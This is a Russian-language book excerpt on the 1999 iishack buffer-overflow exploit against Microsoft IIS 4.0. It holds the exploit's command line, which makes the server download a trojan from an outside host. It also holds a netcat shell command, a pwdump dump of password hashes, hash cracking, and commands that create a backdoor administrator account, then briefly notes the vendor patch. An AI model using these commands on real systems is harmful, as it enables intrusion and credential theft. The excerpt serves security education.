Переполнение буфера
Изъян iishack сервера IIS 4.0
В июне 1999 года широкой общественности стало известно о досадной ошибке в системе защиты сервера IIS 4.0, которая оказалась серьезной угрозой безопасности Web-сервера компании Microsoft. Этот изъян был обнаружен группой экспертов по вопросам безопасности еЕуе, которая поместила в Internet исходный код и исполняемый файл, с помощью которого можно осуществить взлом. Источником проблемы является недостаточная проверка границ имен файлов.НТК,.STM и.юс, содержащихся в адресах URL. Это позволяет взломщику поместить в этот адрес код, который будет загружен на целевую систему и выполнен с правами администратора.
Программа, демонстрирующая использование данного изъяна, называется iishack, а найти ее можно по адресу http://www.technotronic.com (а также И на других Web-узлах). При этом достаточно указать адрес URL и имя файла типа "троянский конь", который нужно запустить:
C:\nt\>iishack 10.12.24.2 80 172.29.11.101/getem.exe ---(US 4.0 remote buffer overflow exploit)– (c) dark spyrit – barns@eeye.com .http://www.eEye.com [usage: iishack <host> <port> <url>] eg – iishack www.example.com 80 www.myserver.com/thetrojan.exe do not include 'http://1 before hosts! Data sent!
Созданная авторами простая программа типа "троянский конь" getem.exe, распаковывает утилиту pwdump.exe (позволяющую получить дамп хеш-кодов базы данных SAM), запускает утилиту netcat, настроенную на прослушивание порта 25, и возвращает обратно командную оболочку (nc -nw -L -р 25 -t -e cmd.exe). После успешного выполнения всех этих действий на собственном компьютере можно запустить утилиту netcat, получив таким образом в свое распоряжение командную оболочку и локальный доступ с привилегиями учетной записи SYSTEM (т.е. с правами администратора):
C:\>nc – nw 10.11.1.1 26 (UNKNOWN) [10.11.1.1] 26 (?) open Microsoft(R) Windows NT (TM) (C) Copyright 1985-1996 Microsoft Corp. С:>pwdump administrator:500:03096B7CD9133319790F5B37EAB66"E30: 5ACA8A3A546DD587A 58A251205881082: Built-in account for administering the computer/doma in: Guest:501:NO PASSWORD ° °****;NO PASSWORD ° °**** °**:Built-in account for guest access to the computer/domain:: sqldude:1000:853FD8DOFA7ECFOFAAD3B435B 51404EE:EE319BA58C3E9BCB45AB13 CD7651FE14::: SQLExecutiveCmdExec:1001:01FC5A6BE7BC6929AAD3B435B51404EE: OCB6948805 F797BF2A82807973B89537:SQLExecutiveCmdExec, SQL Executive CmdExec Task Account:C_:
С помощью простых команд копирования и вставки, применяемых в командной строке, а также программы LOphtCrack, которая используется для взлома хеш-кодов, можно получить в свое распоряжение пароль администратора (и любого другого пользователя системы).
Более простая (но менее скрытая) атака заключается в создании нового пользователя с помощью команды net localgroup password haxor /add, а затем добавление этого пользователя (в данном случае haxor) в группу администраторов с помощью команды net localgroup Administrators haxor /add. Если порт NetBIOS сервера (TCP 139) открыт для взломщика, то он может к нему подключиться и делать все что угодно. Конечно же, поскольку взломщик выполняет в системе значительные изменения, то их можно выявить с использованием простых средств аудита системы.
Контрмеры против изъянов IIS 4.0
Сначала компания Microsoft разработала комплекс рекомендаций для устранения этой проблемы, а затем выпустила модуль обновления. Группа экспертов eEye выпустила свой собственный модуль обновления, однако всегда рекомендуется использовать средства от производителя.